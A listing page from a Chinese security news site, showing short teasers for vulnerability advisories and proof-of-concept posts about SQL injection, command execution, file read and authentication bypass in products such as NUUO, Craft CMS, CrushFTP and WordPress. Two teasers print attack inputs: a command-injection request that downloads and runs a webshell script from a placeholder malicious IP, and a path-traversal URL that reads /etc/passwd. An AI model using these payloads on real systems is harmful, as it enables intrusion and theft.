安全漏洞 - 第 5 | CN-SEC 中文网

安全漏洞

昂捷CRM SQL注入漏洞

0x00 漏洞编号暂无0x01 危险等级高危0x02 漏洞概述昂捷CRM是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。0x03 漏洞详情漏洞类型：SQL注入影响：获取敏感...

04月29日23 views评论

阅读全文

安全漏洞

福建科立讯指挥调度管理平台send_fax远程命令执行漏洞 poc

P字数 319，阅读大约需 2 分钟产品介绍福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率...

04月29日14 views评论

阅读全文

安全漏洞

核弹级漏洞预警｜NUUO监控设备远程沦陷实录(CVE-2025-1338) POC

0x01 漏洞杀伤链攻击向量： GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1Host: t...

04月29日51 views评论

阅读全文

安全漏洞

深澜计费管理系统 down-load 任意文件读取漏洞

内容仅用于学习交流自查使用，由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号Nday Poc及作者不为此承担任何责任，一旦造成后...

04月29日18 views评论

阅读全文

安全漏洞

Craft CMS CVE-2025-32432 exp发布

Craft CMS 0day, CVE-2025-32432 安全研究员 Chocapikk 发布了一个 Metasploit 模块，用于影响 Craft CMS 的关键零日漏洞，该漏洞被追踪为 CV...

04月28日75 views评论

阅读全文

安全漏洞

时空智友企业信息管理系统 updater.getStudioFile 任意文件读取漏洞

01漏洞概述时空智友企业信息管理系统 updater.getStudioFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件...

04月28日44 views评论

阅读全文

安全漏洞

漏洞预警西部数据 NAS remoteBackups.php 命令执行漏洞

0x01 阅读须知融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操...

04月28日36 views评论

阅读全文

安全漏洞

【已复现】Craft CMS generate-transform 反序列化代码执行漏洞（CVE-2025-32432）

↑点击关注，获取更多漏洞预警，技术分享0x01 组件介绍Craft CMS 是一个灵活、用户友好的内容管理系统，用于创建自定义的数字网络体验和其他体验。搜索语法：app="craft-cms"0x02...

04月27日97 views评论

阅读全文

安全漏洞

【成功复现】CrushFTP身份认证绕过漏洞（CVE-2025-2825)

网安引领时代，弥天点亮未来 0x00写在前面本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！0x01漏洞介绍CrushFTP 是由 CrushFTP LLC 开发的...

04月27日22 views评论

阅读全文

安全漏洞

宏景人力资源管理系统 searchCreatPlanList.do SQL注入漏洞(CNVD-2025-6953) POC

一：产品介绍宏景人力资源管理系统是一款专业、高效的一体化HR管理平台，涵盖组织架构、招聘管理、员工档案、考勤薪资、绩效培训等核心模块，通过智能化流程与数据分析助力企业实现人力资源数字化转型升级。系统...

04月27日54 views评论

阅读全文

安全漏洞

WordPress未授权任意文件读取_CVE-2025-2294 POC

一、漏洞暗藏杀机攻击者只需发送特制URL： http://xxxx/?__kubio参数=../../../etc/passwd 即可实现： 🔴 服务器敏感文件裸奔（数据库配置/用户凭证） 🔴 PH...

04月27日42 views评论

阅读全文

安全漏洞

Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

该漏洞源于通过 FortiSwitch Web 界面更改密码时缺乏适当的验证。攻击者可以向set_password终端发送特殊请求，无需登录或任何用户交互即可更改管理员密码。由于该漏洞复杂度较低，因此...

04月25日40 views评论

阅读全文

昂捷CRM SQL注入漏洞

福建科立讯指挥调度管理平台send_fax远程命令执行漏洞 poc

核弹级漏洞预警｜NUUO监控设备远程沦陷实录(CVE-2025-1338) POC

深澜计费管理系统 down-load 任意文件读取漏洞

Craft CMS CVE-2025-32432 exp发布

时空智友企业信息管理系统 updater.getStudioFile 任意文件读取漏洞

漏洞预警西部数据 NAS remoteBackups.php 命令执行漏洞

【已复现】Craft CMS generate-transform 反序列化代码执行漏洞（CVE-2025-32432）

【成功复现】CrushFTP身份认证绕过漏洞（CVE-2025-2825)

宏景人力资源管理系统 searchCreatPlanList.do SQL注入漏洞(CNVD-2025-6953) POC

WordPress未授权任意文件读取_CVE-2025-2294 POC

Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

在线咨询

微信